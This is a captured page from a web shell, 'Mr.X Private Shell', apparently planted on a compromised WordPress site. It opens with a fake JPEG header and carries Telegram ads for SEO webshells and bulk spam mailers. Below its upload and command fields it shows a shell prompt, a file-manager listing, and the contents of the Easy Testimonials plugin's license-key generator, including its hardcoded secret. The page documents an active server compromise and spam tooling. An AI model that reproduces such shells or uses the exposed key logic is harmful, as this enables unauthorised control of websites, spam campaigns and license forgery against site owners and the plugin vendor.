����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php
class ETKG
{
	var $secret = 'BANANAPHONE';
	var $keyPrefix = 'easy_testimonials_';	

	function __construct($config = array())	{

		if (is_array($config))
		{
			if (isset($config['secret'])) {
				$this->secret = $config['secret'];
			}
			if (isset($config['key_prefix'])) {
				$this->keyPrefix = $config['key_prefix'];
			}
		}
	}
	
	function computeKey($url, $email)	{
		$url_parts = parse_url($url);		
				
		$url = isset($url_parts['host']) ? $url_parts['host'] : $url_parts['path'];
						
		if (strpos($url, 'www.') !== 0) {
			$url = 'www.' . $url;
		}	
	
		$key = md5($this->secret . $url . $this->secret . $email . $this->secret);
		$key2 = md5($this->secret . $email . $this->secret . $url . $this->secret);
		$funbox = strlen($key . $key2);
		for($i = 1; $i < 2289; $i++) {
			$key2 = sha1(md5($key2 . $key . $funbox));
			$key = md5(sha1($key . $key2 . $funbox));
		}
		
		return $this->keyPrefix . md5($key);	
	}	
	
	function computeKeyEJ($email)
	{
		$key = md5($this->secret . $email . $this->secret);
		$key2 = md5($this->secret . $email . $this->secret);
		$funbox = strlen($key . $key2);
		for($i = 1; $i < 2289; $i++) {
			$key2 = sha1(md5($key2 . $key . $funbox));
			$key = md5(sha1($key . $key2 . $funbox));
		}
		
		return $this->keyPrefix . md5($key);	
	}
}

Filemanager

Name Type Size Permission Actions
BikeShed Folder 0755
GP_Aloha Folder 0755
GP_Fake_Data_Generator Folder 0755
GP_Janus Folder 0755
GP_Media_Button Folder 0755
GP_Sajak Folder 0755
GP_SmartTextAvatars Folder 0755
easy_testimonials_custom_columns.php File 6.54 KB 0644
error_log File 759 B 0644
etkg.php File 1.31 KB 0644
gp-recaptcha.class.php File 4.81 KB 0644
gp-testimonial.class.php File 38.87 KB 0644
ik-custom-post-type.php File 15.83 KB 0644
lib.php File 1.66 KB 0644